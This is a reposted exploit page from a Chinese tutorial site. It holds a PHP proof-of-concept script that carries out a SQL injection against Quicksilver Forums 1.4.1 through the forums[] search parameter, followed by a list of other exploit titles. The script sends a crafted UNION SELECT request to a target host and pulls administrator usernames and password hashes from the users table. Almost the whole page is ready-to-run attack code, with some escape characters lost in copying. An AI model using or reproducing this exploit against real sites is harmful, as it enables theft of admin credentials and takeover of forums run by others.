手机
当前位置:查字典教程网 >网络安全 >Exploit >Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit
摘要:

<?php

/*

. vuln.: Quicksilver Forums 1.4.1 (forums[]) Remote SQL Injection Exploit

. download: http://www.quicksilverforums.com/

.

. author: irk4z[at]yahoo.pl

. homepage: http://irk4z.wordpress.com/

.

. greets: all friends ;)

.

. this is PoC exploit

*/

$host = $argv[1];

$path = $argv[2];

$prefix = "qsf_"; // this is default prefix

echo

".n. Quicksilver Forums 1.4.1 (forums[]) Remote SQL Injection Exploitn.n".

". author: irk4z[at]yahoo.pln".

". homepage: http://irk4z.wordpress.com/n".

".n".

". usage: php ".$argv[0]." host pathn".

". php ".$argv[0]." localhost /nn";

if(empty($host)||empty($path))die('# wrong host or path..');

$post_data = "query=I-like-it&forums[]=2)/**/limit/**/0/**/UNION/**/SELECT/**/1,1,concat(0x5b3a213a5d,user_name,0x3A,user_password,0x5b3a213a5d),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1/**/FROM/**/".$prefix."users/**/WHERE/**/user_group=1/*&searchtype=match&member_text=&member_select=exact&showposts_check=on&limit_check=on&limit_chars=400&time_check=on&time_way_select=newer&time_select=31&submit=Search";

$data = "POST ".$path."index.php?a=search HTTP/1.1rn";

$data .= "Host: ".$host."rn";

$data .= "Content-Type: application/x-www-form-urlencodedrn";

$data .= "Content-length: ".strlen($post_data)."rn";

$data .= "Connection: Closern";

$data .= "rn";

$data .= $post_data."rnrn";

$s = @fsockopen($host, 80);

if (empty($s)) die('# wrong host..');

fputs($s, $data); $retu ='';

while(!feof($s)){

$retu .= fgets($s);

}

fclose($s);

$tmp = explode('[:!:]',$retu);

if(empty($tmp[1]))die('sorry, exploit failed.. maybe try again in a few seconds..');

echo " " . $tmp[1] . "nndone.";

?>

【Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit】相关文章:

IntelliTamper 2.07 (imgsrc) Remote Buffer Overflow Exploit

TGS CMS 0.3.2r2 Remote Code Execution Exploit

Mercury Mail 4.0.1 (LOGIN) Remote IMAP Stack Buffer Overflow Exploit

Pars4U Videosharing V1 XSS / Remote Blind SQL Injection Exploit

LoveCMS 1.6.2 Final Update Settings Remote Exploit

WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

PHPizabi 0.848b C1 HFP1 Remote Code Execution Exploit

Ultra Office ActiveX Control Remote Arbitrary File Corruption Exploit

Sports Clubs Web Panel 0.0.1 Remote Game Delete Exploit

fuzzylime cms 3.01 (commrss.php) Remote Code Execution Exploit

精品推荐
分类导航